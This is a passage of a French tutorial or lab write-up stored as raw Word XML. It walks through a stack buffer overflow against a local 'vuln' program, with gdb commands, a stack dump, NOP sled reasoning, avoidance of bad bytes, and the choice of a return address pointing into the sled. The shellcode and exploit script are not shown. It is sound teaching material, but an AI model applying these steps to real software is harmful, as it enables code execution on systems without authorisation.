      </w:r>
      <w:r w:rsidR="00774E9A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8FBBE5" w14:textId="77777777" w:rsidR="007753FD" w:rsidRDefault="007753FD" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4110FF51" w14:textId="77777777" w:rsidR="00BD170B" w:rsidRDefault="00B60E1A" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous cherchons maintenant l’adresse </w:t>
      </w:r>
      <w:r w:rsidR="0098280B">
        <w:t xml:space="preserve">que nous allons </w:t>
      </w:r>
      <w:r w:rsidR="00D51B4A">
        <w:t xml:space="preserve">mettre à la place de la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D51B4A">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D51B4A">
        <w:t xml:space="preserve">, c’est-à-dire l’adresse que nous souhaitons </w:t>
      </w:r>
      <w:r w:rsidR="00A41FF4">
        <w:t xml:space="preserve">que le programme exécute à la fin de la fonction. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF3B57" w14:textId="77777777" w:rsidR="00D87F16" w:rsidRDefault="00D87F16" w:rsidP="00D87F16">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDCD9F5" w14:textId="1E8ECABC" w:rsidR="008E2400" w:rsidRDefault="00A41FF4" w:rsidP="00BD170B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comme </w:t>
      </w:r>
      <w:r w:rsidR="0073629D">
        <w:t>la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> taille de la stack peut changer en fonction de la longueur des arguments du programme (ceux-ci se retrouvant copiés au début de la stack), il est important de </w:t>
      </w:r>
      <w:r w:rsidR="008568F6">
        <w:t xml:space="preserve">lancer le programme avec un argument d’une même longueur </w:t>
      </w:r>
      <w:r w:rsidR="008E2400">
        <w:t>que nous souhaitons pour notre attaque, c’est à dire 272 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B625F2E" w14:textId="77777777" w:rsidR="00D87F16" w:rsidRDefault="00D87F16" w:rsidP="00BD170B">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60951CBC" w14:textId="0D3F5ECA" w:rsidR="008E2400" w:rsidRDefault="003858BB" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous relançons le programme dans gdb </w:t>
      </w:r>
      <w:r w:rsidR="00B31BAF">
        <w:t xml:space="preserve">avec comme argument le résultat d’un mini script qui imprime 272 caractères A, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et nous retrouvons de nouveau bloqué au niveau de notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC1C6A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623BB556" w14:textId="77777777" w:rsidR="00D54F09" w:rsidRDefault="00D54F09" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111D2AE3" w14:textId="3524AE98" w:rsidR="00CB08BE" w:rsidRPr="00CB08BE" w:rsidRDefault="00CB08BE" w:rsidP="00CB08B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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) run </w:t>
      </w:r>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$(python2 -c “</w:t>
      </w:r>
      <w:r w:rsidR="006C1224" w:rsidRPr="00F47E89">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print ‘A’*272”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27030A20" w14:textId="77777777" w:rsidR="00CB08BE" w:rsidRPr="00CB08BE" w:rsidRDefault="00CB08BE" w:rsidP="00CB08B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CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Starting program: /home/kali/Downloads/vuln $(python2 hack.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA8484A" w14:textId="77777777" w:rsidR="00CB08BE" w:rsidRPr="00CB08BE" w:rsidRDefault="00CB08BE" w:rsidP="00CB08B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CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[Thread debugging using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EA107A" w14:textId="77777777" w:rsidR="00CB08BE" w:rsidRPr="00CB08BE" w:rsidRDefault="00CB08BE" w:rsidP="00CB08B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CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Using host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library "/lib/x86_64-linux-gnu/libthread_db.so.1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287111C" w14:textId="77777777" w:rsidR="00CB08BE" w:rsidRPr="00CB08BE" w:rsidRDefault="00CB08BE" w:rsidP="00CB08B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</w:p>
    <w:p w14:paraId="12A80B28" w14:textId="77777777" w:rsidR="00CB08BE" w:rsidRPr="00CB08BE" w:rsidRDefault="00CB08BE" w:rsidP="00CB08BE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CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Breakpoint 1, vuln (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=0xffffd2b6 '\220' &lt;repeats 200 times&gt;...) at vuln.c:6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087AC077" w14:textId="53C0C8E9" w:rsidR="00D54F09" w:rsidRPr="00CB08BE" w:rsidRDefault="00CB08BE" w:rsidP="00CB08BE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CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6           </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB08BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer, arg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268BC65D" w14:textId="77777777" w:rsidR="00CB08BE" w:rsidRDefault="00CB08BE" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109F636E" w14:textId="34454BB5" w:rsidR="00210BCF" w:rsidRDefault="006C1224" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous </w:t>
      </w:r>
      <w:r w:rsidR="00AC1C6A">
        <w:t xml:space="preserve">regardons le contenu de la stack à partir du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC1C6A">
        <w:t>buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0011756E">
        <w:t xml:space="preserve">, pour chercher une adresse </w:t>
      </w:r>
      <w:r w:rsidR="00C17154">
        <w:t xml:space="preserve">à sélectionner comme cible pour </w:t>
      </w:r>
      <w:r w:rsidR="00BF622D">
        <w:t xml:space="preserve">l’exécution du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF622D">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF622D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004332CF">
        <w:t>Le script hack.py écrit d’abord une série d’instructions NOP (0x90</w:t>
      </w:r>
      <w:r w:rsidR="00E6170A">
        <w:t>, l’instruction qui ne fait rien</w:t>
      </w:r>
      <w:r w:rsidR="004332CF">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E6170A">
        <w:t xml:space="preserve"> pour compléter le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF1809">
        <w:t>buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF1809">
        <w:t xml:space="preserve">, jusqu’à écrire le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF1809">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF1809">
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r w:rsidR="00BD170B">
        <w:t>finalement</w:t>
      </w:r>
      <w:r w:rsidR="00BF1809">
        <w:t xml:space="preserve"> l’adresse que nous souhaitons exécuter. Nous pouvons donc </w:t>
      </w:r>
      <w:r w:rsidR="00062DD5">
        <w:t>indiquer comme adresse celle d</w:t>
      </w:r>
      <w:r w:rsidR="002325DF">
        <w:t>e n’importe laquelle des</w:t>
      </w:r>
      <w:r w:rsidR="00062DD5">
        <w:t xml:space="preserve"> instructions NOP. Le programme exécutera alors toutes </w:t>
      </w:r>
      <w:r w:rsidR="00B53C62">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00062DD5">
        <w:t xml:space="preserve">es instructions NOP </w:t>
      </w:r>
      <w:r w:rsidR="00B53C62">
        <w:t xml:space="preserve">à la suite de l’adresse que nous avons indiqué </w:t>
      </w:r>
      <w:r w:rsidR="00062DD5">
        <w:t xml:space="preserve">et glissera de cette façon jusqu’au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00062DD5">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00062DD5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BF7635">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6A1AC" w14:textId="77777777" w:rsidR="00D87F16" w:rsidRDefault="00D87F16" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2C3DD6" w14:textId="1132CBE8" w:rsidR="00D87F16" w:rsidRDefault="00BF7635" w:rsidP="002974AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il peut être intéressant de viser une adresse assez éloignée des bornes des instructions NOP (du début du buffer jusqu’au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), de sorte que si la stack se retrouve </w:t>
      </w:r>
      <w:r w:rsidR="003A04A0">
        <w:t xml:space="preserve">légèrement déplacée par rapport à ce que nous avions trouvé (par exemple si on avait </w:t>
      </w:r>
      <w:r w:rsidR="003A04A0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">pas </w:t>
      </w:r>
      <w:r w:rsidR="00210BCF">
        <w:t>bien mis un argument de même taille au lancement du programme pour sélectionner notre adresse)</w:t>
      </w:r>
      <w:r w:rsidR="002325DF">
        <w:t xml:space="preserve"> nous aurions une chance de rester au sein de nos instructions NOP et de</w:t>
      </w:r>
      <w:r w:rsidR="00BD170B">
        <w:t xml:space="preserve"> quand même</w:t>
      </w:r>
      <w:r w:rsidR="002325DF">
        <w:t xml:space="preserve"> glisser de la même façon jusqu’au </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002325DF">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002325DF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488EECC3" w14:textId="5BA11BE0" w:rsidR="00923D09" w:rsidRDefault="007D7BF5" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il est également important d’éviter de sélectionner </w:t>
      </w:r>
      <w:r w:rsidR="008E333E">
        <w:t>une</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> adresse qui </w:t>
      </w:r>
      <w:r w:rsidR="009F300A">
        <w:t>comporterait certains bytes comme 0x00</w:t>
      </w:r>
      <w:r w:rsidR="00D46F29">
        <w:t>, 0x0a ou</w:t>
      </w:r>
      <w:r w:rsidR="009F300A">
        <w:t xml:space="preserve"> 0x10. Ces caractères </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E333E">
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E333E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E333E">
        <w:t>terminator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E333E">
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r w:rsidR="00B57D09">
        <w:t>retour à la ligne</w:t>
      </w:r>
      <w:r w:rsidR="009F300A">
        <w:t xml:space="preserve"> pourraient casser </w:t>
      </w:r>
      <w:r w:rsidR="00FA5AB2">
        <w:t xml:space="preserve">le string en argument et empêcher de copier notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA5AB2">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA5AB2">
        <w:t xml:space="preserve"> en entier au sein du buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478646C8" w14:textId="77777777" w:rsidR="00923D09" w:rsidRDefault="00923D09" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E919FDA" w14:textId="568AF5BE" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">x/68xw </w:t>
      </w:r>
      <w:r w:rsidR="00F47E89" w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&amp;buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AE529A" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffced0:     0xf7fc7424      0xf7ffcff4      0xf7fc76c4      0xf7c18482</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A3A0B5" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcee0:     0xf7fc7694      0x003055e4      0xffffcf10      0x000182af</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D591387" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcef0:     0xffffcfa4      0xf7fbf780      0xf7c12338      0xf7fbf4a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4ED85D" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf00:     0xffffcf54      0xffffcf50      0x00000003      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CF5C13" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf10:     0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      0xf7c12338      0x565552cb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C1B25" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf20:     0xf7c09158      0xf7fbf66c      0xffffcfa4      0x003055e4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A36E8" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0xffffcf30</w:t>
      </w:r>
      <w:r w:rsidRPr="00923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:     0xf7c18482      0xf7fd0f14      0xf7c05638      0xffffcfac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C991B4E" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf40:     0xf7ffdba0      0x00000002      0xf7fbfb20      0x00000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B93B93" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf50:     0x00000000      0x00000001      0xf7fbf4a0      0x56555034</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252F781B" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf60:     0x00000020      0xf7ffdc0c      0xffffcfe4      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F6765" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf70:     0xf7ffcff4      0x0000002c      0x00000000      0xffffcfec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE6163" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf80:     0xf7ffdba0      0x00000001      0xf7fbf7b0      0x00000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7AE8AE" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf90:     0x00000000      0x00000001      0xf7ffda40      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423D539F" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcfa0:     0x00000000      0xffffffff      0x00000000      0xf7fc7694</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BDD0B4" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcfb0:     0xf7ffd608      0x0000002c      0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DFC7058" w14:textId="77777777" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcfc0:     0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      0xffffdfde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58376258" w14:textId="786EA978" w:rsidR="00923D09" w:rsidRPr="00923D09" w:rsidRDefault="00923D09" w:rsidP="00923D09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923D09">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcfd0:     0xf7fc5550      0xf7e20ff4      0xffffd008      0x5655623e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164008B3" w14:textId="77777777" w:rsidR="00923D09" w:rsidRDefault="00923D09" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789DF1F0" w14:textId="1A45BF6D" w:rsidR="00B53C62" w:rsidRDefault="00923D09" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans ce cas-ci, nous sélectionnons comme adresse </w:t>
      </w:r>
      <w:r w:rsidRPr="00A14F3B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="00A14F3B" w:rsidRPr="00A14F3B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cf30</w:t>
      </w:r>
      <w:r w:rsidR="00A14F3B">
        <w:t>, qui combine toutes les propriétés désirées.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C625A" w14:textId="77777777" w:rsidR="00A14F3B" w:rsidRDefault="00A14F3B" w:rsidP="008E2400">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FDC2F2" w14:textId="77777777" w:rsidR="00B57D09" w:rsidRDefault="00A14F3B" w:rsidP="00F47E89">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous pouvons maintenant tester notre </w:t>
      </w:r>
      <w:r w:rsidR="00642513">
        <w:t xml:space="preserve">exploit avec le script hack.py. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A058D9" w14:textId="6F394AF6" w:rsidR="00F47E89" w:rsidRDefault="00642513" w:rsidP="00B57D09">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
